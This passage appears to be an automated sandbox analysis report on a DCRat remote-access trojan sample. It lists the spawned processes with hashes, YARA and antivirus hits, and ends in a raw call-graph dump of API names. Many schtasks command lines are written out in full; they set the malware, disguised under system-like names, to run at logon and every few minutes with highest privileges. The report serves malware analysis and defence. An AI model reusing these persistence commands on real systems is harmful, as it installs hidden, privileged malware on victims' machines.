                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
                    Imagebase:0x1c0000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:20:20:03
                    Start date:22/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:20:20:03
                    Start date:22/11/2024
                    Path:C:\ChainBlocksurrogateagentFont\portperf.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\ChainBlocksurrogateagentFont\portperf.exe"
                    Imagebase:0x4e0000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2222640406.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2222640406.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 74%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:8
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:9
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff642ec0000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:15
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:16
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:17
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:18
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:19
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:20
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
                    Imagebase:0x2c0000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 74%, ReversingLabs
                    Has exited:false

                    Target ID:21
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:22
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:23
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Users\Default\Videos\dfVXJbANbh.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\Default User\Videos\dfVXJbANbh.exe"
                    Imagebase:0xa40000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2314115683.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 74%, ReversingLabs
                    Has exited:true

                    Target ID:24
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Program Files\7-Zip\Lang\System.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\7-Zip\Lang\System.exe"
                    Imagebase:0x990000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2314012773.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 74%, ReversingLabs
                    Has exited:true

                    Target ID:25
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:26
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Program Files\7-Zip\Lang\System.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\7-Zip\Lang\System.exe"
                    Imagebase:0xab0000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2307312574.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Has exited:true

                    Target ID:27
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:28
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:29
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 6 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:30
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:31
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:32
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:33
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:34
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:35
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:36
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:37
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:38
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:39
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat"
                    Imagebase:0x7ff69f860000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:40
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:41
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\w32tm.exe
                    Wow64 process (32bit):false
                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Imagebase:0x7ff78fcb0000
                    File size:108'032 bytes
                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true


                      Execution Graph

                      Execution Coverage:9.8%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.3%
                      Total number of Nodes:1510
                      Total number of Limit Nodes:37
                      execution_graph: interactive call-graph view (node and edge listing with resolved API names, rendered by the report viewer; not reproduced as text)
23390->23487 23393 d7ae80 23404 d6d31c 23393->23404 23394 d7ae5c 23508 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23394->23508 23395 d79e1c 13 API calls 23398 d7ae4d 23395->23398 23397 d7ae64 23509 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23397->23509 23398->23394 23400 d7ae53 DeleteObject 23398->23400 23400->23394 23401 d7ae6d 23510 d79f5d 8 API calls ___scrt_get_show_window_mode 23401->23510 23403 d7ae74 DeleteObject 23403->23393 23521 d6d341 23404->23521 23406 d6d328 23561 d6da4e GetModuleHandleW FindResourceW 23406->23561 23409 d78835 23660 d7e24a 23409->23660 23413 d7a3cc GdiplusShutdown CoUninitialize 23412->23413 23413->23044 23415->23035 23416->23043 23418 d700d9 GetModuleHandleW 23417->23418 23418->23318 23418->23319 23420 d6ad09 GetVersionExW 23419->23420 23421 d6ad45 23419->23421 23420->23421 23421->23333 23423 d7e360 23422->23423 23424 d70092 GetSystemDirectoryW 23423->23424 23425 d700aa 23424->23425 23426 d700c8 23424->23426 23427 d700bb LoadLibraryW 23425->23427 23426->23333 23427->23426 23428->23325 23434 d6ddff 23429->23434 23433 d835bb 23432->23433 23433->23356 23433->23433 23440 d6d28a 23434->23440 23437 d6de22 LoadStringW 23438 d6ddfc 23437->23438 23439 d6de39 LoadStringW 23437->23439 23438->23359 23439->23438 23445 d6d1c3 23440->23445 23442 d6d2a7 23443 d6d2bc 23442->23443 23453 d6d2c8 26 API calls 23442->23453 23443->23437 23443->23438 23446 d6d1de 23445->23446 23452 d6d1d7 _strncpy 23445->23452 23448 d6d202 23446->23448 23454 d71596 WideCharToMultiByte 23446->23454 23451 d6d233 23448->23451 23455 d6dd6b 50 API calls __vsnprintf 23448->23455 23456 d858d9 26 API calls 3 library calls 23451->23456 23452->23442 23453->23443 23454->23448 23455->23451 23456->23452 23457->23375 23459 d63ff4 __vswprintf_c_l 23458->23459 23462 d85759 23459->23462 23465 d83837 23462->23465 23466 d8385f 23465->23466 23467 d83877 23465->23467 23482 d8895a 20 API calls _abort 23466->23482 23467->23466 23469 d8387f 23467->23469 23471 d83dd6 __cftof 38 API 
calls 23469->23471 23470 d83864 23483 d88839 26 API calls pre_c_initialization 23470->23483 23473 d8388f 23471->23473 23484 d83da1 20 API calls 2 library calls 23473->23484 23475 d7ec4a CatchGuardHandler 5 API calls 23477 d63ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23475->23477 23476 d83907 23485 d84186 51 API calls 4 library calls 23476->23485 23477->23385 23480 d8386f 23480->23475 23481 d83912 23486 d83e59 20 API calls _free 23481->23486 23482->23470 23483->23480 23484->23476 23485->23481 23486->23480 23511 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23487->23511 23489 d79d21 23490 d79d2d 23489->23490 23512 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23489->23512 23490->23393 23490->23394 23490->23395 23493 d79e70 23492->23493 23494 d79e3e SizeofResource 23492->23494 23493->23386 23494->23493 23495 d79e52 LoadResource 23494->23495 23495->23493 23496 d79e63 LockResource 23495->23496 23496->23493 23497 d79e77 GlobalAlloc 23496->23497 23497->23493 23498 d79e92 GlobalLock 23497->23498 23499 d79f21 GlobalFree 23498->23499 23500 d79ea1 __vswprintf_c_l 23498->23500 23499->23493 23501 d79ea9 CreateStreamOnHGlobal 23500->23501 23502 d79ec1 23501->23502 23503 d79f1a GlobalUnlock 23501->23503 23513 d79d7b GdipAlloc 23502->23513 23503->23499 23506 d79eef GdipCreateHBITMAPFromBitmap 23507 d79f05 23506->23507 23507->23503 23508->23397 23509->23401 23510->23403 23511->23489 23512->23490 23514 d79d8d 23513->23514 23515 d79d9a 23513->23515 23517 d79b0f 23514->23517 23515->23503 23515->23506 23515->23507 23518 d79b37 GdipCreateBitmapFromStream 23517->23518 23519 d79b30 GdipCreateBitmapFromStreamICM 23517->23519 23520 d79b3c 23518->23520 23519->23520 23520->23515 23522 d6d34b _wcschr __EH_prolog 23521->23522 23523 d6d37a GetModuleFileNameW 23522->23523 23524 d6d3ab 23522->23524 23525 d6d394 23523->23525 23563 d699b0 23524->23563 23525->23524 23528 d6d407 23574 d85a90 26 API calls 3 library calls 23528->23574 23531 d6d3db 23531->23528 23534 d73781 76 API 
calls 23531->23534 23545 d6d627 23531->23545 23532 d6d41a 23575 d85a90 26 API calls 3 library calls 23532->23575 23534->23531 23535 d6d563 23535->23545 23600 d69d30 77 API calls 23535->23600 23539 d6d57d new 23540 d69bf0 80 API calls 23539->23540 23539->23545 23543 d6d5a6 new 23540->23543 23542 d6d42c 23542->23535 23542->23545 23576 d69e40 23542->23576 23591 d69bf0 23542->23591 23599 d69d30 77 API calls 23542->23599 23543->23545 23558 d6d5b2 new 23543->23558 23601 d7137a MultiByteToWideChar 23543->23601 23584 d69653 23545->23584 23546 d6d72b 23602 d6ce72 76 API calls 23546->23602 23548 d6da0a 23607 d6ce72 76 API calls 23548->23607 23550 d6d9fa 23550->23406 23551 d6d771 23603 d85a90 26 API calls 3 library calls 23551->23603 23553 d73781 76 API calls 23555 d6d742 23553->23555 23554 d6d78b 23604 d85a90 26 API calls 3 library calls 23554->23604 23555->23551 23555->23553 23557 d71596 WideCharToMultiByte 23557->23558 23558->23545 23558->23546 23558->23548 23558->23550 23558->23557 23605 d6dd6b 50 API calls __vsnprintf 23558->23605 23606 d858d9 26 API calls 3 library calls 23558->23606 23562 d6d32f 23561->23562 23562->23409 23564 d699ba 23563->23564 23565 d69a39 CreateFileW 23564->23565 23566 d69aaa 23565->23566 23567 d69a59 GetLastError 23565->23567 23569 d69ae1 23566->23569 23571 d69ac7 SetFileTime 23566->23571 23608 d6b66c 23567->23608 23569->23531 23570 d69a79 23570->23566 23572 d69a7d CreateFileW GetLastError 23570->23572 23571->23569 23573 d69aa1 23572->23573 23573->23566 23574->23532 23575->23542 23577 d69e64 SetFilePointer 23576->23577 23578 d69e53 23576->23578 23579 d69e82 GetLastError 23577->23579 23580 d69e9d 23577->23580 23578->23580 23621 d66fa5 75 API calls 23578->23621 23579->23580 23582 d69e8c 23579->23582 23580->23542 23582->23580 23622 d66fa5 75 API calls 23582->23622 23585 d69677 23584->23585 23586 d69688 23584->23586 23585->23586 23587 d69683 23585->23587 23588 d6968a 23585->23588 23586->23406 23623 d69817 23587->23623 23628 d696d0 23588->23628 23593 
